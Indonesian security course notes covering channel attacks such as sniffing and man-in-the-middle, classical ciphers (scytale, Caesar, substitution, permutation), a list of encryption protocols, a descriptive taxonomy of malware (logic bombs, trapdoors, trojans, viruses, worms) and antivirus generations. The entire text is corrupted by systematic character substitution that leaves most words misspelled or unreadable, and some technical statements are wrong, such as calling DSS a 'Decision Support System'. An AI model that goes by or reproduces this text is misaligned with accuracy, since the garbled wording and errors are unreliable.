1hosen0$e& atta)$. 1"&#tana%&st #ada ti#e #en&e"angan ini memi%i$i #engetahan
tentang h+ngan anta"a $n)i0$n)i &ang +e"+eda.
R++e"0hose )"&#tana%&sis. Pada ti#e #en&e"angan ini, )"&#tana%&st mengan)am,
meme"as, ata +ah$an mema$sa seseo"ang hingga me"e$a mem+e"i$an $n)in&a.
8* 1ENI( PEN/ERAN2AN PADA 1ALUR KOMUNIKA(I
Sniffin/: se)a"a ha"a(iah +e"a"ti mengends, tentn&a da%am ha% ini &ang
diends ada%ah #esan '+ai$ &ang +e%m ata#n sdah dien$"i#si* da%am sat
sa%"an $omni$asi. Ha% ini mm te",adi #ada sa%"an #+%i$ &ang tida$ aman. Sang
#engends da#at me"e$am #em+i)a"aan &ang te",adi.
,eplay attac" 7DHMM :D<: 6i$a seseo"ang +isa me"e$am #esan0#esan
handsha"e '#e"sia#an $omni$asi*, ia mng$in da#at meng%ang #esan0#esan &ang
te%ah di"e$amn&a nt$ meni# sa%ah sat #iha$.
Spoofin/ 7DHMM :D<: Pen&e"ang Y misa%n&a Maman Y +isa men&ama"
men,adi Anto. Sema o"ang di+at #e")a&a +ah4a Maman ada%ah Anto. Pen&e"ang
+e"saha me&a$in$an #iha$0#iha$ %ain +ah4a ta$ ada sa%ah dengan $omni$asi &ang
di%a$$an, #adaha% $omni$asi it di%a$$an dengan sang #eni#2#en&e"ang.
1ontohn&a ,i$a o"ang memas$$an PIN $e da%am mesin ATM #a%s Y &ang +ena"0
+ena" di+at se#e"ti ATM as%i Y tent sang #eni# +isa menda#at$an PIN0n&a dan
)o#& #ita magenti$ $a"t ATM mi%i$ sang nasa+ah. Piha$ +an$ tida$ tah +ah4a
te%ah te",adi $e,ahatan.
5an-in-the-middle 7S)hn :D<: 6i$a spoofin/ te"$adang han&a meni# sat
#iha$, ma$a da%am s$ena"io ini, saat Anto henda$ +e"$omni$asi dengan !ad,
Maman di mata Anto seo%ah0o%ah ada%ah !ad, dan Maman da#at #%a meni# !ad
sehingga Maman seo%ah0o%ah ada%ah Anto. Maman da#at +e"$asa #enh atas ,a%"
$omni$as ini, dan +isa mem+at +e"ita (itnah.
METODE CR/PTO2RA3I
)* METODE KUNO
a. @;8 S.M. +angsa S#a"ta, sat +angsa mi%ite" #ada ,aman Cnani $no, menggna$an
te$ni$ $"i#tog"a(i &ang dise+t s)&ta%e, nt$ $e#entingan #e"ang. S)&ta%e te"+at da"i
tong$at dengan #a#&"s &ang menge%i%ingin&a se)a"a s#i"a%.
Kn)i da"i s)&ta%e ada%ah diamete" tong$at &ang digna$an o%eh #engi"im ha"s sama dengan
diamete" tong$at &ang dimi%i$i o%eh #ene"ima #esan, sehingga #esan &ang disem+n&i$an
da%am #a#&"s da#at di+a)a dan dimenge"ti o%eh #ene"ima.
+. 6%is 1aesa", seo"ang $aisa" te"$ena% Roma4i &ang mena$%$$an +an&a$ +angsa di E"o#a
dan Tim" Tengah ,ga menggna$an sat te$ni$ $"i#tog"a(i &ang se$a"ang dise+t 1aesa"
)i#he" nt$ +e"$o"es#ondensi se$ita" tahn DG S.M. Te$ni$ &ang digna$an o%eh Sang
1aesa" ada%ah mens+stitsi$an a%(a+et se)a"a +e"at"an, &ait o%eh a%(a+et $etiga &ang
mengi$tin&a, misa%n&a, a%(a+et ./AU diganti$an o%eh UDU, U!U o%eh UEU, dan sete"sn&a.
Se+agai )ontoh, sat #esan +e"i$t :
Gam+a" >. 1aesa" 1i#he"
Dengan at"an &ang di+at o%eh 6%is 1aesa" te"se+t, #esan se+ena"n&a ada%ah UPen,a"a$an
#ang%ima di3isi $e t,h sege"aU.
4* TEKNIK DA(AR KRIPTO2RA3I
a* (ubst!tus!
Sa%ah sat )ontoh te$ni$ ini ada%ah 1aesa" )i#he" &ang te%ah di)ontoh$an diatas. Lang$ah
#e"tama ada%ah mem+at sat ta+e% s+stitsi. Ta+e% s+stitsi da#at di+at ses$a hati,
dengan )atatan +ah4a #ene"ima #esan memi%i$i ta+e% &ang sama nt$ $e#e"%an de$"i#si.
!i%a ta+e% s+stitsi di+at se)a"a a)a$, a$an sema$in s%it #eme)ahan )i#he"teKt o%eh o"ang
&ang tida$ +e"ha$.
A0!010D0E0F0G0H0I060K0L0M0N0O0P0Z0R0S0T0U0M0=0P0C0T090>0?0@080D0;0J0:0G0.0,
!0F090K0Z0G0A0T0P060D0H0C0D0>0P080M0M0;010J0@0I0:0N0R0E0U0?0L0S0=0,0.0O0T0G
Gam+a" ?. Ta+e% S+stitsi
Ta+e% s+stitsi diatas di+at se)a"a a)a$. Dengan menggna$an ta+e% te"se+t, da"i #%ainteKt
U8 te$ni$ dasa" $"i#tog"a(iU dihasi%$an )i#he"teKt UL ;ZDDPD K!M!M DMPP;>AM!GPU.
Dengan menggna$an ta+e% s+stitsi &ang sama se)a"a dengan a"ah &ang te"+a%i$ '"e3e"se*,
#%ainteKt da#at di#e"o%eh $em+a%i da"i )i#he"teKt0n&a.
b* 0lo,#!n
Sistem en$"i#si te"$adang mem+agi #%ainteKt men,adi +%o$0+%o$ &ang te"di"i da"i +e+e"a#a
$a"a$te" &ang $emdian dien$"i#si$an se)a"a inde#enden. P%ainteKt &ang dien$"i#si$an
dengan menggna$an te$ni$ +%o)$ing ada%ah :
Gam+a" @. En$"i#si dengan !%o)$ing
Dengan menggna$an en$"i#si +%o)$ing di#i%ih ,m%ah %a," dan $o%om nt$ #en%isan
#esan. 6m%ah %a," ata $o%om men,adi $n)i +agi $"i#tog"a(i dengan te$ni$ ini. P%ainteKt
dit%is$an se)a"a 3e"ti$a% $e +a4ah +e""tan #ada %a,", dan di%an,t$an #ada $o%om
+e"i$tn&a sam#ai se%"hn&a te"t%is. 1i#he"teKt0n&a ada%ah hasi% #em+a)aan #%ainteKt
se)a"a ho"iEonta% +e""tan sesai dengan +%o$0n&a. 6adi )i#he"teKt &ang dihasi%$an dengan
te$ni$ ini ada%ah U8K G KRTDRAEAIFKSPINAT IROU. P%ainteKt da#at #%a dit%is se)a"a
ho"iEonta% dan )i#he"teKtn&a ada%ah hasi% #em+a)aan se)a"a 3e"ti$a%.
,* Permutas!
Sa%ah sat te$ni$ en$"i#si &ang te"#enting ada%ah #e"mtasi ata se"ing ,ga dise+t
t"ans#osisi. Te$ni$ ini memindah$an ata me"otasi$an $a"a$te" dengan at"an te"tent.
P"insi#n&a ada%ah +e"%a4anan dengan te$ni$ s+stitsi. Da%am te$ni$ s+stitsi, $a"a$te"
+e"ada #ada #osisi &ang teta# ta#i identitasn&a &ang dia)a$. Pada te$ni$ #e"mtasi, identitas
$a"a$te"n&a teta#, namn #osisin&a &ang dia)a$. Se+e%m di%a$$an #e"mtasi, mmn&a
#%ainteKt te"%e+ih dah% di+agi men,adi +%o$0+%o$ dengan #an,ang &ang sama.
Unt$ )ontoh diatas, #%ainteKt a$an di+agi men,adi +%o$0+%o$ &ang te"di"i da"i D $a"a$te",
dengan at"an #e"mtasi se+agai +e"i$t :
Gam+a" 8. Pe"mtasi
Dengan menggna$an at"an diatas, ma$a #"oses en$"i#si dengan #e"mtasi da"i #%ainteKt
ada%ah se+agai +e"i$t :
!LOK 9
!LOK >
!LOK ? !LOK @
!LOK 8 !LOK D
!LOK ;
Gam+a" D. P"oses En$"i#si dengan Pe"mtasi
1i#he"teKt &ang dihasi%$an dengan te$ni$ #e"mtasi ini ada%ah UN ETK8 SKD AIIRK
RAATGORP FIU.
d* E#spans!
Sat metode sede"hana nt$ menga)a$ #esan ada%ah dengan meme%a"$an #esan it dengan
at"an te"tent. Sa%ah sat )ontoh #enggnaan te$ni$ ini ada%ah dengan me%eta$$an h"(
$onsonan ata +i%angan gan,i% &ang men,adi a4a% da"i sat $ata di a$hi" $ata it dan
menam+ah$an a$hi"an UanU. !i%a sat $ata dim%ai dengan h"( 3o$a% ata +i%angan gena#,
ditam+ah$an a$hi"an UiU. P"oses en$"i#si dengan )a"a e$s#ansi te"hada# #%ainteKt te",adi
se+agai +e"i$t :
Gam+a" ;. En$"i#si dengan E$s#ansi
1i#he"teKtn&a ada%ah U8AN EKNIKTAN ASARDAN RIPTOGRAFIKANU. At"an e$s#ansi
da#at di+at %e+ih $om#%e$s. Te"$adang te$ni$ e$s#ansi diga+ng$an dengan te$ni$ %ainn&a,
$a"ena te$ni$ ini +i%a +e"di"i sendi"i te"%a% mdah nt$ di#e)ah$an.
e* Pemampatan 'Compa,t!on9
Meng"angi #an,ang #esan ata ,m%ah +%o$n&a ada%ah )a"a %ain nt$ men&em+n&i$an isi
#esan. 1ontoh sede"hana ini menggna$an )a"a menghi%ang$an setia# $a"a$te" $e0tiga se)a"a
+e""tan. Ka"a$te"0$a"a$te" &ang dihi%ang$an disat$an $em+a%i dan diss%$an se+agai
U%am#i"anU da"i #esan tama, dengan dia4a%i o%eh sat $a"a$te" $hss, da%am )ontoh ini
digna$an UAU. P"oses &ang te",adi nt$ #%ainteKt $ita ada%ah :
Gam+a" J. En$"i#si dengan Pemam#atan
At"an #enghi%angan $a"a$te" dan $a"a$te" $hss &ang +e"(ngsi se+agai #emisah men,adi
dasa" nt$ #"oses de$"i#si )i#he"teKt men,adi #%ainteKt $em+a%i.
Dengan menggna$an $e%ima te$ni$ dasa" $"i#tog"a(i diatas, da#at di)i#ta$an $om+inasi
te$ni$ $"i#tog"a(i &ang amat +an&a$, dengan (a$to" &ang mem+atasi semata0mata han&a%ah
$"eati3itas dan ima,inasi $ita. =a%a#n se$i%as te"%ihat sede"hana, $om+inasi te$ni$ dasa"
$"i#tog"a(i da#at menghasi%$an te$ni$ $"i#tog"a(i t"nan &ang )$# $om#%e$s, dan
+e+e"a#a te$ni$ dasa" $"i#tog"a(i masih digna$an da%am te$ni$ $"i#tog"a(i mode"n.
0ER0A2AI (OLU(I ENKRIP(I MODERN
9. Data En)"&#tion Standa"d 'DES*
standa" +agi USA Go3e"nment
did$ng ANSI dan IETF
#o#%a" nt$ metode se)"et $e&
te"di"i da"i : @G0+it, 8D0+it dan ?K8D0+it 'T"i#%e DES*
>. Ad3an)ed En)"&#tion Standa"d 'AES*
nt$ mengganti$an DES '%an)hing a$hi" >GG9*
menggna$an 3a"ia+%e %ength +%o)$ )hi##e"
$e& %ength : 9>J0+it, 9:>0+it, >8D0+it
da#at dite"a#$an nt$ sma"t )a"d.
?. Digita% 1e"ti(i)ate Se"3e" 'D1S*
3e"i(i$asi nt$ digita% signat"e
atenti$asi se"
menggna$an #+%i) dan #"i3ate $e&
)ontoh : Nets)a#e 1e"ti(i)ate Se"3e"
@. IP Se)"it& 'IPSe)*
en$"i#si #+%i)2#"i3ate $e&
di"an)ang o%eh 1IS1O S&stem
menggna$an DES @G0+it dan athenti)ation
+i%t0in #ada #"od$ 1IS1O
so%si te#at nt$ Mi"ta% P"i3ate Net4o"$ 'MPN* dan Remote Net4o"$
A))ess
8. Ke"+e"os
so%si nt$ se" athenti)ation
da#at menangani m%ti#%e #%at(o"m2s&stem
("ee )ha"ge 'o#en so")e*
I!M men&edia$an 3e"si $ome"sia% : G%o+a% Sign On 'GSO*
D. Point to #oint Tnne%ing P"oto)o%'PPTP*, La&e" T4o Tnne%ing P"oto)o% 'L>TP*
di"an)ang o%eh Mi)"oso(t
atenti)ation +e"dasa"$an PPP'Point to #oint #"oto)o%*
en$"i#si +e"dasa"$an a%go"itm Mi)"oso(t 'tida$ te"+$a*
te"integ"asi dengan NOS Mi)"oso(t 'NT, >GGG, PP*
;. Remote A))ess Dia%0in Use" Se"3i)e 'RADIUS*
m%ti#%e "emote a))ess de3i)e menggna$an 9 data+ase nt$ athenti)ation
did$ng o%eh ?)om, 1IS1O, As)end
tida$ menggna$an en)"&#tion
J. RSA En)"&#tion
di"an)ang o%eh Ri3est, Shami", Ad%eman tahn 9:;;
standa" de (a)to da%am en$"i#si #+%i)2#"i3ate $e&
did$ng o%eh Mi)"oso(t, a##%e, no3e%%, sn, %ots
mend$ng #"oses athenti)ation
m%ti #%at(o"m
:. Se)"e Hash A%go"itm 'SHA*
di"an)ang o%eh Nationa% Institte o( Standa"d and Te)hno%og& 'NIST* USA.
+agian da"i standa" DSS'De)ision S##o"t S&stem* USA dan +e$e",a sama
dengan DES nt$ digita% signat"e.
SHA09 men&edia$an 9DG0+it message digest
Me"si : SHA0>8D, SHA0?J@, SHA089> 'te"integ"asi dengan AES*
9G. MD8
di"an)ang o%eh P"o(. Ro+e"t Ri3est 'RSA, MIT* tahn 9::9
menghasi%$an 9>J0+it digest.
)e#at ta#i $"ang aman
99. Se)"e She%% 'SSH*
digna$an nt$ )%ient side athenti)ation anta"a > sistem
mend$ng UNIP, 4indo4s, OS2>
me%indngi te%net dan (t# '(i%e t"ans(e" #"oto)o%*
9>. Se)"e So)$et La&e" 'SSL*
di"an)ang o%eh Nets)a#e
men&edia$an en$"i#si RSA #ada %a&es session da"i mode% OSI.
inde#enden te"hada# se"3ise &ang digna$an.
me%indngi s&stem se)"e 4e+ e0)omme")e
metode #+%i)2#"i3ate $e& dan da#at me%a$$an athenti)ation
te"integ"asi da%am #"od$ +"o4se" dan 4e+ se"3e" Nets)a#e.
9?. Se)"it& To$en
a#%i$asi #en&im#anan #ass4o"d dan data se" di sma"t )a"d
9@. Sim#%e Ke& Management (o" Inte"net P"oto)o%
se#e"ti SSL +e$e",a #ada %e3e% session mode% OSI.
menghasi%$an $e& &ang stati), mdah +o+o%.
APLIKA(I ENKRIP(I
!e+e"a#a a#%i$asi &ang meme"%$an en$"i#si nt$ #engamanan data ata
$omni$asi dianta"an&a ada%ah :
a. 6asa te%e$omni$asi
En$"i#si nt$ mengaman$an in(o"masi $on(idensia% +ai$ +e"#a sa"a,
data, ma#n gam+a" &ang a$an di$i"im$an $e %a4an +i)a"an&a.
En$"i#si #ada t"ans(e" data nt$ $e#e"%an mana,emen ,a"ingan dan
t"ans(e" on0%ine data +i%%ing.
En$"i#si nt$ men,aga )o#&"ight da"i in(o"masi &ang di+e"i$an.
+. Mi%ite" dan #eme"intahan
En$"i#si dianta"an&a digna$an da%am #engi"iman #esan.
Men&im#an data0data "ahasia mi%ite" dan $enega"aan da%am media
#en&im#anann&a se%a% da%am $eaadan te"en$"i#si.
). Data Pe"+an$an
In(o"masi t"ans(e" ang anta" +an$ ha"s se%a% da%am $eadaan te"en$"i#si
d. Data $on(idensia% #e"sahaan
Ren)ana st"ategis, (o"m%a0(o"m%a #"od$, data+ase #e%anggan2$a"&a4an
dan data+ase o#e"asiona%
#sat #en&im#anan data #e"sahaan da#at dia$ses se)a"a on0%ine.
Te$ni$ en$"i#si ,ga ha"s dite"a#$an nt$ data $on(idensia% nt$
me%indngi data da"i #em+a)aan ma#n #e"+ahan se)a"a tida$ sah.
e. Pengamanan e%e)t"oni) mai%
Mengaman$an #ada saat dit"ansmisi$an ma#n da%am media
#en&im#anan.
A#%i$asi en$"i#si te%ah di+at $hss nt$ mengaman$an e0mai%,
dianta"an&a PEM 'P"i3a)& Enhan)ed Mai%* dan PGP 'P"ett& Good
P"i3a)&*, $edan&a +e"+asis DES dan RSA.
(. Ka"t P%asti$
En$"i#si #ada SIM 1a"d, $a"t te%e#on mm, $a"t %angganan TM $a+e%,
$a"t $ont"o% a$ses "angan dan $om#te", $a"t $"edit, $a"t ATM, $a"t
#eme"i$saan medis, d%%
En$"i#si te$no%ogi #en&im#anan data se)a"a magneti), o#ti$, ma#n
)hi#.
KEAMANAN DARI DEVIL PROGRAM
Ta#sonom! an,aman peran#at luna# - #las!%!#as! proram ja"at 'mal!,!ous proram9:
9. P"og"am0#"og"am &ang meme"%$an #"og"am inang 'host #"og"am*. F"agmen
#"og"am tida$ da#at mandi"i se)a"a inde#enden da"i sat #"og"am a#%i$asi, #"og"am
ti%itas ata #"og"am sistem.
>. P"og"am0#"og"am &ang tida$ meme"%$an #"og"am inang. P"og"am sendi"i &ang
da#at di,ad4a%$an dan di,a%an$an o%eh sistem o#e"asi.
T!pe.t!pe proram ja"at :
9. 0a,ter!a : #"og"am &ang meng$onsmsi sm+e" da&a sistem dengan me"e#%i$asi
di"in&a sendi"i. !a)te"ia tida$ se)a"a e$s#%isit me"sa$ (i%e. T,an #"og"am ini han&a
sat &ait me"e#%i$asi di"in&a. P"og"am +a)te"ia &ang sede"hana +isa han&a
menge$se$si da $o#ian di"in&a se)a"a sim%tan #ada sistem m%ti#"og"amming
ata men)i#ta$an da (i%e +a", masing0masing ada%ah $o#ian (i%e #"og"am +a)te"ia.
Keda $o#ian in $emdian meng$o#i da $a%i, dan sete"sn&a.
>. Lo!, bomb : %ogi$ &ang ditem#e%$an #ada #"og"am $om#te" aga" meme"i$sa sat
$m#%an $ondisi di sistem. Keti$a $ondisi0$ondisi &ang dima$sd ditemi, %ogi$
menge$se$si sat (ngsi &ang menghasi%$an a$si0a$si ta$ dioto"isasi.
Logi) +om+ menem#e% #ada sat #"og"am "esmi &ang diset me%eda$ $eti$a
$ondisi0$ondisi te"tent di#enhi.
1ontoh $ondisi0$ondisi nt$ memi) %ogi) +om+ ada%ah ada ata tda$ adan&a
(i%e0(i%e te"tent, ha"i te"tent da" mingg ata tangga%, ata #ema$ai
men,a%an$an a#%i$asi te"tent. !egit te"#i), +om+ meng+ah ata mengha#s
data ata se%"h (i%e, men&e+a+$an mesin te"henti, ata menge",a$an #e"sa$an
%ain.
?. Trapdoor : Titi$ mas$ ta$ te"do$mentasi "ahasia di sat #"og"am nt$
mem+e"i$an a$ses tan#a metode0metode otenti(i$asi no"ma%.
T"a#doo" te%ah di#a$ai se)a"a +ena" se%ama +e"tahn0tahn o%eh #emog"am nt$
men)a"i $esa%ahan #"og"am. De+gging dan testing +iasan&a di%a$$an
#emog"am saat mengem+ang$an a#%i$asi. Unt$ #"og"am &ang mem#n&ai
#"osed" otenti(i$asi ata set# %ama ata meme"%$an #ema$ai memas$$an
ni%ai0ni%ai +e"+eda nt$ men,a%an$an a#%i$asi ma$a de+gging a$an %ama +i%a
ha"s me%e4ati #"osed"0#"osed" te"se+t. Unt$ de+g #"og"am ,enis ini,
#engem+ang mem+at $e4enangan $hss ata menghi%ang$an $e#e"%an set#
dan otenti(i$asi.
T"a#doo" ada%ah $ode &ang mene"ima sat +a"isan mas$an $hss ata di#i)
dengan men,a%an$an ID #ema$ai te"tent ata +a"isan $e,ahatan te"tent.
T"a#doo" men,adi an)aman $eti$a digna$an #em"og"am ,ahat nt$ mem#e"o%eh
#eng$asesan ta$ dioto"isasi.
Pada $ass n&ata, adito" '#eme"i$s* #e"ang$at %na$ da#at menem$an t"a#doo"
#ada #"od$ #e"ang$at %na$ dimana nama #en)i#ta #e"ang$at %na$ +e"%a$$
se+agai #ass4o"d &ang memintas #"ote$si #e"ang$at %na$ &ang di+atn&a.
Ada%ah s%it mengim#%ementasi$an $enda%i0$enda%i #e"ang$at %na$ nt$
t"a#doo".
@. Trojan "orse : Rtin ta$ te"do$mentasi "ahasia ditem#e%$an da%am sat #"og"am
+e"gna. P"og"am &ang +e"gna mengandng $ode te"sem+n&i &ang $eti$a
di,a%an$an me%a$$an sat (ngsi &ang ta$ diingin$an. E$se$si #"og"am
men&e+a+$an e$se$si "tin "ahasia ini.
P"og"am0#"og"am t"o,an ho"se digna$an nt$ me%a$$an (ngsi0(ngsi se)a"a
tida$ %angsng dimana #ema$ai ta$ dioto"isasi tida$ da#at me%a$$ann&a se)a"a
%angsng. 1ontoh, nt$ da#at menga$ses (i%e0(i%e #ema$ai %ain #ada sistem
di#a$ai +e"sama, #ema$ai da#at men)i#ta$an #"og"am t"o,an ho"se.
T"o,an ho"se ini $eti$a #"og"am die$se$si a$an meng+ah i,in0i,in (i%e sehinga
(i%e0(i%e da#at di+a)a o%eh sem+a"ang #ema$ai. Pen)i#ta #"og"am da#at
men&e+a"$an $e #ema$ai0#ema$ai dengan menem#at$an #"og"am di di"e$to"i
+e"sama dan menamai #"og"amn&a sedemi$ian "#a sehingga disang$a se+agai
#"og"am ti%itas &ang +e"gna.
P"og"am t"o,an ho"se &ang s%it didete$si ada%ah $om#i%ato" &ang dimodi(i$asi
sehingga men&isi#$an $ode tam+ahan $e #"og"am0#"og"am te"tent +egit
di$om#i%asi, se#e"ti #"og"am %ogin. Kode men)i#ta$an t"a#doo" #ada #"og"am
%ogin &ang mengi,in$an #en)i#ta %og $e sistem menggna$an #ass4o"d $hss.
T"o,an ho"se ,enis ini ta$ #e"nah da#at ditem$an ,i$a han&a mem+a)a #"og"am
sm+e". Moti3asi %ain da"i t"o,an ho"se ada%ah #enghan)"an data. P"og"am
mn)% se+agai me%a$$an (ngsi0(ngsi +e"gna 'se#e"ti $a%$%ato"*, ta#i ,ga
se)a"a diam0diam mengha#s (i%e0(i%e #ema$ai.
T"o,an ho"se +iasa ditem#e%$an #ada #"og"am0#"og"am ata "tin0"tin &ang
diam+i% da"i !!S, inte"net, dan se+again&a.
8. :!rus : Kode &ang ditem#e%$an da%am sat #"og"am &ang men&e+a+$an #eng$o#ian
di"in&a disisi#$an $e sat #"og"am %ain ata %e+ih, dengan )a"a memodi(i$asi
#"og"am0#"og"am it.
Modi(i$asi di%a$$an dengan memas$$an $o#ian #"og"am 3i"s &ang da#at
mengin(e$si #"og"am0#"og"am %ain. Se%ain han&a #"ogasi, 3i"s +iasan&a
me%a$$an (ngsi &ang ta$ diingin$an.
Di da%am 3i"s $om#te", te"da#at $ode int"$si &ang da#at mem+at $o#ian
sem#"na di"in&a. Keti$a $om#te" &ang te"in(e$si +e"h+ngan '$onta$* dengan
#e"ang$at %na$ &ang +e%m te"in(e$si, $o#ian 3i"s memas$i #"og"am +a".
In(e$si da#at men&e+a" da"i $om#te" $e $om#te" me%a%i #ema$ai0#ema$ai
&ang men$a"$an dis$ ata mengi"im #"og"am me%a%i ,a"ingan. Pada %ing$ngan
,a"ingan, $emam#an menga$ses a#%i$asi dan %a&anan0%a&anan $om#te" %ain
me"#a$an (asi%itas sem#"na #en&e+a"an 3i"s.
Masa%ah &ang ditim+%$an 3i"s ada%ah 3i"s se"ing me"sa$ sistem $om#te"
se#e"ti mengha#s (i%e, #a"tisi dis$, ata menga)a$an #"og"am.
(!#lus "!dup :!rus me%a%i em#at (ase 'taha#*, &ait :
Fase tid" 'do"mant #hase*. Mi"s da%am $eadaan mengangg". Mi"s
a$an ti+a0ti+a a$ti( o%eh sat $e,adian se#e"ti ti+an&a tangga% te"tent,
$ehadi"an #"og"am ata (i%e te"tent, ata $a#asitas dis$ &ang me%e4ati
+atas. Tida$ sema 3i"s mem#n&ai taha# ini.
Fase #"o#agasi '#"o#agation #hase*. Mi"s menem#at$an $o#ian di"in&a
$e #"og"am %ain ata dae"ah sistem te"tent di dis$. P"og"am &ang te"in(e$si
3i"s a$an mem#n&ai $%oning 3i"s. K%oning 3i"s it da#at $em+a%i
memas$i (ase #"o#agasi.
Fase #emi)an 't"igge"ing #hase*. Mi"s dia$ti($an nt$ me%a$$an
(ngsi te"tent. Se#e"ti #ada (ase tid", (ase #emi)an da#at dise+a+$an
+e"agam $e,adian sistem te"mas$ #enghitngan ,m%ah $o#ian di"in&a.
Fase e$se$si 'eKe)tion #hase*. Mi"s men,a%an$an (ngsin&a,
(ngsin&a mng$in se#e%e se#e"ti se$eda" menam#i%$an #esan di%a&a" ata
me"sa$ se#e"ti me"sa$ #"og"am dan (i%e0(i%e data, dan se+again&a.
Ke+an&a$an 3i"s me%a$$an $e",an&a nt$ sat sistem o#e"asi te"tent,
%e+ih s#esi(i$ %agi #ada #%at(o"m #e"ang$at $e"as te"tent. Mi"s03i"s
di"an)ang meman(aat$an "in)ian0"in)ian dan $e%emahan0$e%emahan sistem
te"tent.
Klas!%!#as! t!pe +!rus :
a. Pa"asiti) 3i"s. Me"#a$an 3i"s t"adisiona% dan +ent$ 3i"s &ang #a%ing
se"ing. Ti#e ini men)anto%$an di"in&a $e (i%e .eKe. Mi"s me"e#%i$asi $eti$a
#"og"am te"in(e$si die$se$si dengan men)a"i (i%e0(i%e .eKe %ain nt$
diin(e$si.
+. Memo"& "esident 3i"s. Mi"s memat$an di"i $e memo"i tama se+agai
+agian #"og"am &ang meneta#. Mi"s mengin(e$si setia# #"og"am &ang
die$se$si.
). !oot se)to" 3i"s. Mi"s mengin(e$si maste" +oot "e)o"d ata +oot "e)o"d dan
men&e+a" saat sistem di+oot da"i dis$ &ang +e"isi 3i"s.
d. Stea%th 3i"s. Mi"s &ang +ent$n&a te%ah di"an)ang aga" da#at
men&em+n&i$an di"i da"i dete$si #e"ang$at %na$ anti3i"s.
e. Po%&mo"#hi) 3i"s. Mi"s +e"mtasi setia# $a%i me%a$$an in(e$si. Dete$si
dengan #enandaan 3i"s te"se+t tida$ dimng$in$an. Pen%is 3i"s da#at
me%eng$a#i dengan a%at0a%at +ant #en)i#taan 3i"s +a" '3i"s )"eation
too%$it, &ait "tin0"tin nt$ men)i#ta$an 3i"s03i"s +a"*. Dengan a%at
+ant ini #en)i#taan 3i"s +a" da#at di%a$$an dengan )e#at. Mi"s03i"s
&ang di)i#ta$an dengan a%at +ant +iasan&a $"ang )anggih di+anding 3i"s0
3i"s &ang di"an)ang da"i a4a%.
D. ;orm : P"og"am &ang da#at me"e#%i$asi di"in&a dan mengi"im $o#ian0$o#ian da"i
$om#te" $e $om#te" %e4at h+ngan ,a"ingan. !egit ti+a, 4o"m dia$ti($an nt$
me"e#%i$asi dan #"ogasai $em+a%i. Se%ain han&a #"o#agasi, 4o"m +iasan&a me%a$$an
(ngsi &ang ta$ diingin$an.
Net4o"$ 4o"m menggna$an h+ngan ,a"ingan nt$ men&e+a" da"i sistem $e
sistem %ain. Se$a%i a$ti( di sat sistem, net4o"$ 4o"m da#at +e"%a$ se#e"ti 3i"s
ata +a)te"ia, ata menem#e%$an #"og"am t"o,an ho"se ata me%a$$an se,m%ah
a$si men,eng$e%$an ata menghan)"$an.
Unt$ me"e#%i$asi di"in&a, net4o"$ 4o"m menggna$an sat %a&anan ,a"ingan,
se#e"ti : Fasi%itas s"at e%e$t"oni$ 'e%e)t"oni) mai% (a)i%it&*, &ait 4o"m
mengi"im$an $o#ian di"in&a $e sistem0sistem %ain.
Kemam#an e$se$si ,a"a$ ,ah '"emote eKe)tion )a#a+i%it&*, &ait 4o"m
menge$se$si $o#ian di"in&a di sistem %ain.
Kemam#an %ogin ,a"a$ ,ah '"emote %ogin )a#a+i%it&*, &ait 4o"m %og #ada
sistem ,ah se+agai #ema$ai dan $emdian menggna$an #e"intah nt$
meng$o#i di"in&a da"i sat sistem $e sistem %ain. Ko#ian #"og"am 4o"m &ang
+a" $emdian di,a%an$an di sistem ,ah dan me%a$$an (ngsi0(ngsi %ain &ang
di%a$$an di sistem it, 4o"m te"s men&e+a" dengan )a"a &ang sama.
Net4o"$ 4o"m mem#n&ai )i"i0)i"i &ang sama dengan 3i"s $om#te", &ait
mem#n&ai (ase0(ase sama, &ait : Do"mant #hase, P"o#agation #hase, T"ige""ing
#hase, EKe)tion #hase.
Net4o"$ 4o"m ,ga +e"saha menent$an a#a$ah sistem se+e%mn&a te%ah
diin(e$si se+e%m mengi"im $o#ian di"in&a $e sistem it.

Ant!+!rus
So%si idea% te"hada# an)aman 3i"s ada%ah pen,ea"an. 6a"ingan dii,in$an 3i"s mas$ $e
sistem. Sasa"an ini, ta$ mng$in di%a$sana$an se#enhn&a. Pen)egahan da#at me"ed$si
se,m%ah se"angan 3i"s. Sete%ah #en)egahan te"hada# mas$n&a 3i"s, ma$a #ende$atan
+e"i$tn&a &ang da#at di%a$$an ada%ah :
9. Dete#s!. !egit in(e$si te%ah te",adi, tent$an a#a$ah in(e$si memang te%ah te",adi
dan )a"i %o$asi 3i"s.
>. Ident!%!#as!. !egit 3i"s te"dete$si ma$a identi(i$asi 3i"s &ang mengin(e$si
#"og"am.
?. Pen"!lanan. !egit 3i"s da#at diidenti(i$asi ma$a hi%ang$an sema ,e,a$ 3i"s
da"i #"og"am &ang te"in(e$si dan #"og"am di$em+a%i$an $e sema 'se+e%m
te"in(e$si*. 6i$a dete$si 3i"s s$ses di%a$$an, ta#i identi(i$asi ata #enghi%angan
,e,a$ tida$ da#at di%a$$an, ma$a a%te"nati( &ang di%a$$an ada%ah mengha#s
#"og"am &ang te"in(e$si dan $o#i $em+a%i +a)$# #"og"am &ang masih +e"sih.
Pe"$em+angan #"og"am anti3i"s da#at di#e"iode men,adi em#at gene"asi, &ait :
9. 2eneras! pertama : se$eda" s)anne" sede"hana. Anti3i"s
mens)an #"og"am nt$ menem$an #enanda 'signat"e* 3i"s. =a%a#n 3i"s
mng$in +e"isi $a"a$te"0$a"a$te" 3a"ian, ta#i se)a"a esensi mem#n&ai st"$t" dan
#o%a +it &ang sama di sema $o#iann&a. Te$nis ini te"+atas nt$ dete$si 3i"s03i"s
&ang te%ah di$ena%. Ti#e %ain anti3i"s gene"asi #e"tama ada%ah menge%o%a "e$aman
#an,ang '$"an* #"og"am dan meme"i$sa #e"+ahan #an,ang #"og"am.
>. 2eneras! #edua : s)anne" &ang #inta" 'he"isti) s)anne"*.
Anti3i"s mens)an tida$ +e"gantng #ada #enanda s#esi(i$. Anti3i"s menggna$an
at"an0at"an #inta" 'he"isti) "%es* nt$ men)a"i $emng$inan in(e$si 3i"s.Te$ni$
&ang di#a$ai misa%n&a men)a"i ("agmen0 ("agmen $ode &ang se"ing me"#a$an
+agian 3i"s. 1ontohn&a, anti3i"s men)a"i a4a% %oo# en$"i#si &ang digna$an
#o%&mo"#hi) 3i"s dan menem$an $n)i en$"i#si. !egit $n)i ditem$an, anti3i"s
da#at mendes$"i#si 3i"s nt$ identi(i$asi dan $emdian menghi%ang$an in(e$si
3i"s. Te$ni$ ini ada%ah #eme"i$sanaan integ"itas. 1he)$sm da#at ditam+ah$an di
